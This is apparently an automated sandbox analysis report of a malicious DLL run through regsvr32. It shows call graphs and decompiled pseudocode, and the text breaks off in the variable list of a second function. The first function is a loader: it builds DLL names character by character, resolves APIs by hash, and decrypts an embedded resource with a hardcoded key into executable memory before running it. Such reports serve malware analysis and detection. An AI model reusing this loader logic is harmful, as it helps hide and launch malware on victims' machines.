10008afb 45190 10008b02 45189->45190 45191 1003b59d __getdrive 69 API calls 45189->45191 45190->44974 45192 10008b27 45191->45192 45192->44974 45228 10008de0 45193->45228 45195 10009daa 45195->44993 45196->44990 45197->44970 45198->44981 45199->44983 45201 1003b587 45200->45201 45213 1003b4e8 45200->45213 45226 100440da 5 API calls __decode_pointer 45201->45226 45203 1003b58d 45227 1003d47e 69 API calls __getptd_noexit 45203->45227 45206 1003b593 45206->45189 45209 1003b54b RtlAllocateHeap 45209->45213 45210 1003b4fd 45210->45213 45219 10044097 69 API calls 2 library calls 45210->45219 45220 10043ef7 69 API calls 7 library calls 45210->45220 45221 10040bdb GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 45210->45221 45212 1003b57e 45212->45189 45213->45209 45213->45210 45213->45212 45214 1003b572 45213->45214 45217 1003b570 45213->45217 45222 1003b48b 69 API calls 4 library calls 45213->45222 45223 100440da 5 API calls __decode_pointer 45213->45223 45224 1003d47e 69 API calls __getptd_noexit 45214->45224 45225 1003d47e 69 API calls __getptd_noexit 45217->45225 45219->45210 45220->45210 45222->45213 45223->45213 45224->45217 45225->45212 45226->45203 45227->45206 45230 10008e73 ___DllMainCRTStartup 45228->45230 45229 1000919f GetNativeSystemInfo 45231 1000925c ___DllMainCRTStartup 45229->45231 45230->45229 45233 10009513 45230->45233 45232 10009445 GetProcessHeap HeapAlloc 45231->45232 45231->45233 45232->45233 45235 10009579 ___DllMainCRTStartup 45232->45235 45233->45195 45234 10009adc ___DllMainCRTStartup 45244 10009b47 45234->45244 45255 100088f0 ??3@YAXPAX ??3@YAXPAX GetProcessHeap HeapFree 45234->45255 45235->45234 45237 1000973b memcpy 45235->45237 45245 100066c0 memset memcpy ___DllMainCRTStartup 45237->45245 45238 10009b3a 45238->45195 45240 10009927 ___DllMainCRTStartup 45240->45234 45246 10007ae0 IsBadHugeReadPtr realloc IsBadHugeReadPtr 45240->45246 45242 10009a84 45242->45234 45247 10007030 45242->45247 45244->45195 45245->45240 45246->45242 45248 10007104 ___DllMainCRTStartup 45247->45248 45249 100072d9 45248->45249 45253 10007301 ___DllMainCRTStartup 45248->45253 45256 10006d80 45249->45256 45251 100072f0 45251->45234 45252 10006d80 ___DllMainCRTStartup VirtualProtect 45252->45253 45253->45252 45254 100075ba 45253->45254 45254->45234 45255->45238 45257 10006d93 45256->45257 45258 10006d9d 45256->45258 45257->45251 45259 10006fc9 VirtualProtect 45258->45259 45260 10006dc7 45258->45260 45259->45251 45260->45251 45261 1002d69c 45262 1002d6a8 __EH_prolog3 45261->45262 45264 1002d6f6 45262->45264 45272 1002d2c7 EnterCriticalSection 45262->45272 45286 1001729e 2 API calls 4 library calls 45262->45286 45287 1002d3d7 TlsAlloc InitializeCriticalSection 45262->45287 45288 1002d154 EnterCriticalSection TlsGetValue LeaveCriticalSection LeaveCriticalSection 45264->45288 45266 1002d703 45269 1002d709 45266->45269 45270 1002d71c ~_Task_impl 45266->45270 45289 1002d479 90 API calls 4 library calls 45269->45289 45277 1002d2e6 45272->45277 45273 1002d3a2 _memset 45274 1002d3b6 LeaveCriticalSection 45273->45274 45274->45262 45275 1002d334 GlobalHandle GlobalUnlock 45279 10001710 ctype 82 API calls 45275->45279 45276 1002d31f 45290 10001710 45276->45290 45277->45273 45277->45275 45277->45276 45281 1002d351 GlobalReAlloc 45279->45281 45282 1002d35b 45281->45282 45283 1002d383 GlobalLock 45282->45283 45284 1002d366 GlobalHandle GlobalLock 45282->45284 45285 1002d374 LeaveCriticalSection 45282->45285 45283->45273 45284->45285 45285->45283 45286->45262 45287->45262 45288->45266 45289->45270 45291 1000171c 45290->45291 45292 1000172b GlobalAlloc 45291->45292 45294 10001000 82 API calls ctype 45291->45294 45292->45282

                                                                                                                Executed Functions

                                                                                                                Function 10009DB0 Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 347memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 60%
                                                                                                                			E10009DB0(void* __ebp, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				char _v32;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				short _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				char _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				short _v72;
				short _v74;
				char _v76;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				struct HWND__* _t60;
				struct HWND__* _t69;
				void* _t71;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				intOrPtr _t85;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr _t88;
				intOrPtr _t89;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HRSRC__* _t97;
				int _t99;
				void* _t100;
				void* _t102;
				intOrPtr _t106;
				signed int _t111;
				void* _t120;
				void* _t121;
				void* _t122;
				struct HINSTANCE__* _t123;
				signed int _t133;
				intOrPtr* _t138;
				int _t140;
				void* _t141;
				void* _t142;
				struct HRSRC__* _t143;
				void* _t144;
				void* _t149;
				signed int _t151;
				signed int _t157;
				void* _t161;

				_t144 = __ebp;
				_t157 =  &_v84;
				_t51 =  *0x1006dbdc; // 0xdf7c0cda
				_v4 = _t51 ^ _t157;
				_v84 = _a4;
				if(_a8 != 1) {
					L14:
					return E1003B437(1, _t120, _v4 ^ _t157, _t135, 0, _t140);
				} else {
					_t141 = CreateWindowExW;
					if(CreateWindowExW(0x3db, L"MainConsole", L"FormClass", 0x38, 0x156, 0x22b7, 0x7b, 0x379, 0, 0, 0, 0) == 0) {
						GetLastError();
					}
					_t121 = ShowWindow;
					ShowWindow(0, 0); // executed
					_t60 = CreateWindowExA(0x298, "StartForme", "One Click", 0x60, 0x1bb, 0x1a11, 1, 0x379, 0, 0, 0, 0); // executed
					_t164 = _t60;
					if(_t60 != 0) {
						ShowWindow(0, 0);
					}
					if(E10008AF0(_t121, _t141, _t164) != 0) {
						E1003BE3F(_t121, _t135, 0, _t141, __eflags);
						__eflags = 0;
						return E1003B437(0, _t121, _v4 ^ _t157 + 0x00000004, _t135, 0, _t141, 0x10057acc);
					} else {
						_push(_t144);
						_v30 = 0x65;
						_v24 = 0x65;
						_v26 = 0x6e;
						_v76 = 0x6e;
						 *0x1006c2bc = 0;
						 *0x1006c2c0 = 0;
						 *0x1006c2c4 = 0;
						 *0x1006c2cc = 0;
						 *0x1006c2c8 = 0;
						 *0x1006c2d0 = 0;
						 *0x1006c2d4 = 0;
						_v32 = 0x6b;
						_v28 = 0x72;
						_v22 = 0x6c;
						_v20 = 0x33;
						_v18 = 0x32;
						_v16 = 0x2e;
						_v14 = 0x64;
						_v12 = 0x6c;
						_v10 = 0x6c;
						_v8 = 0;
						_v74 = 0x74;
						_v72 = 0x64;
						_v70 = 0x6c;
						_v68 = 0x6c;
						_v66 = 0x2e;
						_v64 = 0x64;
						_v62 = 0x6c;
						_v60 = 0x6c;
						_v58 = 0;
						_v56 = 0x6d;
						_v54 = 0x73;
						_v52 = 0x76;
						_v50 = 0x63;
						_v48 = 0x72;
						_v46 = 0x74;
						_v44 = 0x2e;
						_v42 = 0x64;
						_v40 = 0x6c;
						_v38 = 0x6c;
						_v36 = 0;
						if(CreateWindowExW(0x3db, L"MainConsole", L"FormClass", 0x38, 0x156, 0x22b7, 0x7b, 0x379, 0, 0, 0, 0) == 0) {
							GetLastError();
						}
						ShowWindow(0, 0); // executed
						_t69 = CreateWindowExA(0x298, "StartForme", "One Click", 0x60, 0x1bb, 0x1a11, 1, 0x379, 0, 0, 0, 0); // executed
						if(_t69 != 0) {
							ShowWindow(0, 0);
						}
						_t142 = E10005AE0( &_v32);
						_t71 = E10005AE0( &_v76);
						_t122 = E10005AE0( &_v56);
						_push(0x1e0f99a8);
						_push(_t122);
						_t74 = E10005C60();
						_push(0x1f5799a4);
						_push(_t122);
						 *0x1006effc = _t74;
						_t75 = E10005C60();
						_push(0x91bb8b03);
						_push(_t122);
						 *0x1006eff4 = _t75;
						_t76 = E10005C60();
						_push(0xac289a52);
						_push(_t122);
						 *0x1006eff8 = _t76;
						_t77 = E10005C60();
						_push(0x8b7db30);
						_push(_t122);
						 *0x1006eff0 = _t77;
						_t78 = E10005C60();
						_push(0x2017d77e);
						_push(_t122);
						 *0x1006efec = _t78;
						_t79 = E10005C60();
						_push(0x1fbfdb79);
						_push(_t122);
						 *0x1006efe8 = _t79;
						_t80 = E10005C60();
						_push(0x33c2345a);
						_push(_t142);
						 *0x1006efe4 = _t80;
						_t81 = E10005C60();
						_push(0x1a71cc9d);
						_push(_t142);
						 *0x1006f03c = _t81;
						_t82 = E10005C60();
						_push(0x45db32b0);
						_push(_t142);
						 *0x1006f038 = _t82;
						_t83 = E10005C60();
						_push(0xe5169db9);
						_push(_t142);
						 *0x1006f034 = _t83;
						_t84 = E10005C60();
						_push(0x1b972e21);
						_push(_t142);
						 *0x1006f030 = _t84;
						_t85 = E10005C60();
						_push(0x1e5e64b8);
						_push(_t142);
						 *0x1006f02c = _t85;
						_t86 = E10005C60();
						_push(0xf05a3fad);
						_push(_t142);
						 *0x1006f028 = _t86;
						_t87 = E10005C60();
						_push(0xaedc0763);
						_push(_t142);
						 *0x1006f024 = _t87;
						_t88 = E10005C60();
						_push(0x10298d2c);
						_push(_t71);
						 *0x1006f020 = _t88;
						_t89 = E10005C60();
						_push(0x12d49424);
						_push(_t142);
						 *0x1006f01c = _t89;
						_t90 = E10005C60();
						_push(0x89df54bc);
						_push(_t142);
						 *0x1006f018 = _t90;
						_t91 = E10005C60();
						_push(0x1113b348);
						_push(_t142);
						 *0x1006f014 = _t91;
						_t92 = E10005C60();
						_push(0x8e1ebcb4);
						_push(_t142);
						 *0x1006f010 = _t92;
						_t93 = E10005C60();
						_push(0xfda10490);
						_push(_t142);
						 *0x1006f00c = _t93;
						_t94 = E10005C60();
						_push(0x355e8d81);
						_push(_t142);
						 *0x1006f008 = _t94;
						_t95 = E10005C60();
						_push(0xe0fb020e);
						_push(_t142);
						 *0x1006f004 = _t95;
						_t96 = E10005C60();
						_t123 = _v84;
						_t161 = _t157 + 0xc4;
						 *0x1006f000 = _t96; // executed
						_t97 = FindResourceW(_t123, 0x323, 0x10057af0); // executed
						_t143 = _t97;
						_v80 = LoadResource(_t123, _t143);
						_t99 = SizeofResource(_t123, _t143);
						_t138 =  *0x1006f038;
						_t140 = _t99;
						if(_t138 == 0) {
							_t100 = VirtualAlloc(0, _t140, 0x3000, 0x40);
						} else {
							_t133 =  *0x1006c2c0; // 0x0
							_t151 =  *0x1006c2cc; // 0x0
							_t111 =  *0x1006c2c8; // 0x0
							_t45 = ((1 - _t133) *  *0x1006c2cc + (_t151 - _t111 -  *0x1006c2bc) * _t111 +  *0x1006c2d0 + (3 - _t133 * _t133) *  *0x1006c2c4) * 2; // 0x41
							_t100 =  *_t138(0xffffffff, 0, _t140, 0x3000, (1 - _t133) *  *0x1006c2cc + (_t151 - _t111 -  *0x1006c2bc) * _t111 +  *0x1006c2d0 + (3 - _t133 * _t133) *  *0x1006c2c4 + _t45 + 0x40, 0);
						}
						_t135 = _v80;
						_t120 = _t100;
						memcpy(_t120, _v80, _t140);
						_t102 = malloc(0x2d0);
						_t149 = _t102;
						E10006020();
						E10006370();
						 *0x1006eff8(_t149, _t149, _t120, _t140, _t149, "Sf&zWTW#0&KS&HyX#7fFHDrtUBt)GjeI+98ErdEK$gdK#R", 0x2f);
						_t106 = E10009D80(_t120, _t140);
						_t157 = _t161 + 0x34;
						 *0x1006f044 = _t106;
						 *0x1006f040(_v84, 1, 0);
						goto L14;
					}
				}
			}



























































































                                                                                                                0x10009db0
                                                                                                                0x10009db0
                                                                                                                0x10009db3
                                                                                                                0x10009dba
                                                                                                                0x10009dc3
                                                                                                                0x10009dd0
                                                                                                                0x1000a273
                                                                                                                0x1000a287
                                                                                                                0x10009dd6
                                                                                                                0x10009dd6
                                                                                                                0x10009e08
                                                                                                                0x10009e0a
                                                                                                                0x10009e0a
                                                                                                                0x10009e10
                                                                                                                0x10009e18
                                                                                                                0x10009e40
                                                                                                                0x10009e46
                                                                                                                0x10009e48
                                                                                                                0x10009e4c
                                                                                                                0x10009e4c
                                                                                                                0x10009e55
                                                                                                                0x1000a28f
                                                                                                                0x1000a2a0
                                                                                                                0x1000a2aa
                                                                                                                0x10009e5b
                                                                                                                0x10009e5b
                                                                                                                0x10009e8c
                                                                                                                0x10009e91
                                                                                                                0x10009ea0
                                                                                                                0x10009ea5
                                                                                                                0x10009eb4
                                                                                                                0x10009eba
                                                                                                                0x10009ec0
                                                                                                                0x10009ec6
                                                                                                                0x10009ecc
                                                                                                                0x10009ed2
                                                                                                                0x10009ed8
                                                                                                                0x10009ede
                                                                                                                0x10009ee5
                                                                                                                0x10009eec
                                                                                                                0x10009ef1
                                                                                                                0x10009efb
                                                                                                                0x10009f05
                                                                                                                0x10009f0d
                                                                                                                0x10009f15
                                                                                                                0x10009f1d
                                                                                                                0x10009f25
                                                                                                                0x10009f2d
                                                                                                                0x10009f32
                                                                                                                0x10009f37
                                                                                                                0x10009f3c
                                                                                                                0x10009f41
                                                                                                                0x10009f46
                                                                                                                0x10009f4b
                                                                                                                0x10009f50
                                                                                                                0x10009f55
                                                                                                                0x10009f5a
                                                                                                                0x10009f61
                                                                                                                0x10009f68
                                                                                                                0x10009f6f
                                                                                                                0x10009f76
                                                                                                                0x10009f7d
                                                                                                                0x10009f82
                                                                                                                0x10009f87
                                                                                                                0x10009f8c
                                                                                                                0x10009f91
                                                                                                                0x10009f96
                                                                                                                0x10009f9f
                                                                                                                0x10009fa1
                                                                                                                0x10009fa1
                                                                                                                0x10009fa9
                                                                                                                0x10009fd1
                                                                                                                0x10009fd9
                                                                                                                0x10009fdd
                                                                                                                0x10009fdd
                                                                                                                0x10009fee
                                                                                                                0x10009ff0
                                                                                                                0x1000a001
                                                                                                                0x1000a003
                                                                                                                0x1000a008
                                                                                                                0x1000a009
                                                                                                                0x1000a00e
                                                                                                                0x1000a013
                                                                                                                0x1000a014
                                                                                                                0x1000a019
                                                                                                                0x1000a01e
                                                                                                                0x1000a023
                                                                                                                0x1000a024
                                                                                                                0x1000a029
                                                                                                                0x1000a02e
                                                                                                                0x1000a033
                                                                                                                0x1000a034
                                                                                                                0x1000a039
                                                                                                                0x1000a03e
                                                                                                                0x1000a043
                                                                                                                0x1000a044
                                                                                                                0x1000a049
                                                                                                                0x1000a04e
                                                                                                                0x1000a053
                                                                                                                0x1000a054
                                                                                                                0x1000a059
                                                                                                                0x1000a05e
                                                                                                                0x1000a063
                                                                                                                0x1000a064
                                                                                                                0x1000a069
                                                                                                                0x1000a071
                                                                                                                0x1000a076
                                                                                                                0x1000a077
                                                                                                                0x1000a07c
                                                                                                                0x1000a081
                                                                                                                0x1000a086
                                                                                                                0x1000a087
                                                                                                                0x1000a08c
                                                                                                                0x1000a091
                                                                                                                0x1000a096
                                                                                                                0x1000a097
                                                                                                                0x1000a09c
                                                                                                                0x1000a0a1
                                                                                                                0x1000a0a6
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0ac
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b6
                                                                                                                0x1000a0b7
                                                                                                                0x1000a0bc
                                                                                                                0x1000a0c1
                                                                                                                0x1000a0c6
                                                                                                                0x1000a0c7
                                                                                                                0x1000a0cc
                                                                                                                0x1000a0d1
                                                                                                                0x1000a0d6
                                                                                                                0x1000a0d7
                                                                                                                0x1000a0dc
                                                                                                                0x1000a0e1
                                                                                                                0x1000a0e6
                                                                                                                0x1000a0e7
                                                                                                                0x1000a0ec
                                                                                                                0x1000a0f4
                                                                                                                0x1000a0f9
                                                                                                                0x1000a0fa
                                                                                                                0x1000a0ff
                                                                                                                0x1000a104
                                                                                                                0x1000a109
                                                                                                                0x1000a10a
                                                                                                                0x1000a10f
                                                                                                                0x1000a114
                                                                                                                0x1000a119
                                                                                                                0x1000a11a
                                                                                                                0x1000a11f
                                                                                                                0x1000a124
                                                                                                                0x1000a129
                                                                                                                0x1000a12a
                                                                                                                0x1000a12f
                                                                                                                0x1000a134
                                                                                                                0x1000a139
                                                                                                                0x1000a13a
                                                                                                                0x1000a13f
                                                                                                                0x1000a144
                                                                                                                0x1000a149
                                                                                                                0x1000a14a
                                                                                                                0x1000a14f
                                                                                                                0x1000a156
                                                                                                                0x1000a15b
                                                                                                                0x1000a15c
                                                                                                                0x1000a162
                                                                                                                0x1000a167
                                                                                                                0x1000a16c
                                                                                                                0x1000a16d
                                                                                                                0x1000a172
                                                                                                                0x1000a177
                                                                                                                0x1000a17b
                                                                                                                0x1000a189
                                                                                                                0x1000a18e
                                                                                                                0x1000a190
                                                                                                                0x1000a19c
                                                                                                                0x1000a1a0
                                                                                                                0x1000a1a6
                                                                                                                0x1000a1ae
                                                                                                                0x1000a1b0
                                                                                                                0x1000a215
                                                                                                                0x1000a1b2
                                                                                                                0x1000a1b2
                                                                                                                0x1000a1b8
                                                                                                                0x1000a1ca
                                                                                                                0x1000a1fa
                                                                                                                0x1000a208
                                                                                                                0x1000a208
                                                                                                                0x1000a21b
                                                                                                                0x1000a220
                                                                                                                0x1000a224
                                                                                                                0x1000a22f
                                                                                                                0x1000a237
                                                                                                                0x1000a23f
                                                                                                                0x1000a247
                                                                                                                0x1000a24d
                                                                                                                0x1000a255
                                                                                                                0x1000a25a
                                                                                                                0x1000a25e
                                                                                                                0x1000a26a
                                                                                                                0x00000000
                                                                                                                0x1000a270
                                                                                                                0x10009e55

                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32 ref: 10009E04
                                                                                                                • GetLastError.KERNEL32(?,?,00000001), ref: 10009E0A
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10009E18
                                                                                                                • CreateWindowExA.USER32 ref: 10009E40
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10009E4C
                                                                                                                • CreateWindowExW.USER32 ref: 10009F9B
                                                                                                                • GetLastError.KERNEL32 ref: 10009FA1
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10009FA9
                                                                                                                • CreateWindowExA.USER32 ref: 10009FD1
                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 10009FDD
                                                                                                                • FindResourceW.KERNEL32(?,00000323,10057AF0), ref: 1000A18E
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1000A194
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 1000A1A0
                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 1000A215
                                                                                                                • memcpy.MSVCRT ref: 1000A224
                                                                                                                • malloc.MSVCRT ref: 1000A22F
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 1000A24D
                                                                                                                • _printf.LIBCMT ref: 1000A28F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CreateShow$Resource$ErrorLast$??3@AllocFindLoadSizeofVirtual_printfmallocmemcpy
                                                                                                                • String ID: 2$3$FormClass$MainConsole$One Click$Sf&zWTW#0&KS&HyX#7fFHDrtUBt)GjeI+98ErdEK$gdK#R$StartForme$c$k$m$r$r$s$v
                                                                                                                • API String ID: 3994317079-1836535338
                                                                                                                • Opcode ID: 4a3e9dbd5743d56e720101978c5c463fd20b91b65e557ebcd9c306c806cd55f8
                                                                                                                • Instruction ID: b0106599c515f6b93cebefedc9fe1fed015a17e80c2994035335cc9516bd7a3f
                                                                                                                • Opcode Fuzzy Hash: 4a3e9dbd5743d56e720101978c5c463fd20b91b65e557ebcd9c306c806cd55f8
                                                                                                                • Instruction Fuzzy Hash: FFC1A074A08354AAF310DBB58CC9E5B7AE9FF99740F40041EF644E7262E7F5A5008B6A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A50CF Relevance: 41.1, Strings: 32, Instructions: 1098COMMONCrypto
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 84 1a50cf-1a6382 85 1a638d-1a6393 84->85 86 1a6399 85->86 87 1a6817-1a681d 85->87 88 1a67fa-1a6812 call 1c26fc 86->88 89 1a639f-1a63a5 86->89 90 1a6a2e-1a6a34 87->90 91 1a6823 87->91 88->85 95 1a63ab 89->95 96 1a6653-1a6659 89->96 92 1a6a3a 90->92 93 1a6bdb-1a6be1 90->93 97 1a6829-1a682f 91->97 98 1a6c56-1a6c64 call 1acde0 91->98 99 1a6af9-1a6bd9 call 1b8ef8 * 2 call 1b3231 call 1bf94b * 2 92->99 100 1a6a40-1a6a46 92->100 105 1a6be3-1a6be9 93->105 106 1a6c21-1a6c2f call 1bfecb 93->106 107 1a65fd-1a6604 call 1c0e7a 95->107 108 1a63b1-1a63b7 95->108 102 1a665f 96->102 103 1a6741-1a6747 96->103 109 1a6975-1a697b 97->109 110 1a6835 97->110 120 1a6c69-1a6c70 98->120 144 1a6c3a-1a6c40 99->144 111 1a6a4c-1a6a52 100->111 112 1a6ae3-1a6aea call 1b8131 100->112 118 1a66f4-1a6735 call 1b34da call 1b96d4 102->118 119 1a6665-1a666b 102->119 116 1a674d-1a6753 103->116 117 1a67d7-1a67f5 call 1aa9cf 103->117 121 1a6c0b-1a6c1c call 1bd15e 105->121 122 1a6beb-1a6bf1 105->122 151 1a6c34-1a6c35 106->151 138 1a6609-1a660b 107->138 123 1a63bd 108->123 124 1a6456-1a645c 108->124 125 1a6a0a-1a6a29 call 1b604b 109->125 126 1a6981-1a6987 109->126 127 1a683b-1a6841 110->127 128 1a694c-1a6957 call 1bf5cd 110->128 149 1a6a99-1a6ade call 1ae65a 111->149 150 1a6a54-1a6a5a 111->150 155 1a6aef-1a6af4 112->155 139 1a67b7-1a67d2 call 1b17d2 116->139 140 1a6755-1a675b 116->140 117->85 238 1a6737-1a673c 118->238 142 1a666d-1a6673 119->142 143 1a66e1-1a66e5 call 1a9c1b 119->143 121->85 122->144 145 1a6bf3-1a6c06 122->145 146 1a63bf-1a63c5 123->146 147 1a6434-1a6451 call 1b17d2 123->147 131 1a6462-1a6468 124->131 132 1a65e3-1a65f8 call 1b9285 124->132 209 1a6625-1a662b 125->209 133 1a6989-1a698f 126->133 134 1a6a00-1a6a05 126->134 135 1a6932-1a6947 call 1a8ee5 127->135 136 1a6847-1a684d 127->136 198 1a695d-1a6970 call 1bd4ae 128->198 199 1a68b0-1a68b5 128->199 172 1a646e-1a6474 131->172 173 1a653d-1a655f call 1c0a01 131->173 132->85 174 1a69c2-1a69fb call 1a7f28 call 1aae33 133->174 175 1a6991-1a6997 133->175 134->85 135->85 156 1a6853-1a6855 136->156 157 1a6915-1a692d call 1c1fc7 136->157 159 1a660d-1a661f call 1bf5cd 138->159 160 1a6630-1a664e call 1bf5cd 138->160 139->238 176 1a678b-1a678f call 1c13a3 140->176 177 1a675d-1a6763 140->177 161 1a66c3-1a66ca call 1a8844 142->161 162 1a6675-1a667b 142->162 200 1a66ea-1a66ef 143->200 144->85 167 1a6c46 144->167 145->85 163 1a6416-1a6424 call 1b1a83 146->163 164 1a63c7-1a63cd 146->164 147->85 149->85 180 1a6a5c-1a6a62 150->180 181 1a6a86-1a6a94 call 1b26f3 150->181 151->144 155->85 185 1a685b-1a6861 156->185 186 1a68e3-1a6910 call 1c22a1 156->186 157->85 159->209 160->85 226 1a66cf-1a66d1 161->226 190 1a66ad-1a66b4 call 1a9af8 162->190 191 1a667d-1a6683 162->191 163->120 250 1a642a-1a642f 163->250 192 1a63f9-1a6411 call 1c1cdc 164->192 193 1a63cf-1a63d5 164->193 167->120 203 1a64e0-1a64e4 172->203 204 1a6476-1a647c 172->204 258 1a656a-1a6573 173->258 259 1a6561-1a6568 173->259 174->85 175->144 205 1a699d-1a69ab call 1a82d2 175->205 236 1a6794-1a67b2 call 1bf5cd 176->236 177->144 207 1a6769-1a677b call 1b34da 177->207 180->144 212 1a6a68-1a6a6f call 1b416e 180->212 181->85 185->144 215 1a6867-1a6887 call 1a188c 185->215 186->85 246 1a66b9-1a66be 190->246 191->144 220 1a6689-1a66a8 call 1bfad1 191->220 192->85 221 1a63db-1a63e1 193->221 222 1a6c48-1a6c54 call 1a2f0b 193->222 198->199 199->85 200->85 233 1a6536-1a6538 203->233 234 1a64e6-1a651e call 1aec54 call 1a79cc 203->234 204->144 230 1a6482-1a64db call 1aec54 call 1beec2 204->230 253 1a69b0-1a69b2 205->253 207->120 269 1a6781-1a6786 207->269 209->85 260 1a6a74-1a6a76 212->260 275 1a68ba-1a68c4 215->275 276 1a6889-1a68ae call 1b96d4 215->276 220->85 221->144 245 1a63e7-1a63f7 221->245 222->120 226->120 249 1a66d7-1a66dc 226->249 230->85 233->144 294 1a652a-1a6531 call 1b8966 234->294 295 1a6520-1a6525 234->295 236->85 238->85 245->85 246->85 249->85 250->85 253->120 266 1a69b8-1a69bd 253->266 272 1a65a7-1a65aa 258->272 273 1a6575-1a65a0 call 1b96d4 258->273 271 1a65d7-1a65de 259->271 260->120 274 1a6a7c-1a6a81 260->274 266->85 269->85 271->85 272->271 281 1a65ac-1a65d5 call 1b96d4 272->281 273->272 274->85 283 1a68d0-1a68d2 275->283 284 1a68c6-1a68cb 275->284 276->199 281->271 292 1a68d9-1a68de 283->292 293 1a68d4-1a68d7 283->293 284->85 292->85 293->199 293->292 294->233 295->85
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001A50CF() {
				char _v44;
				signed int _v48;
				char _v76;
				signed int _v100;
				signed int _v112;
				intOrPtr _v132;
				signed int _v136;
				char _v144;
				signed int _v152;
				intOrPtr _v156;
				signed int _v160;
				char _v172;
				char _v180;
				char _v188;
				char _v192;
				void* _v196;
				char _v200;
				char _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				unsigned int _v404;
				signed int _v408;
				unsigned int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				unsigned int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				unsigned int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				unsigned int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				unsigned int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				void* __ebx;
				signed int _t1143;
				signed int _t1144;
				void* _t1172;
				signed int _t1179;
				signed int _t1199;
				signed int _t1214;
				signed int _t1216;
				signed int _t1217;
				signed int _t1218;
				signed int _t1219;
				signed int _t1220;
				signed int _t1221;
				signed int _t1222;
				signed int _t1223;
				signed int _t1224;
				signed int _t1225;
				signed int _t1226;
				signed int _t1227;
				signed int _t1228;
				signed int _t1229;
				signed int _t1230;
				signed int _t1231;
				signed int _t1232;
				signed int _t1233;
				signed int _t1234;
				signed int _t1235;
				signed int _t1236;
				signed int _t1237;
				signed int _t1238;
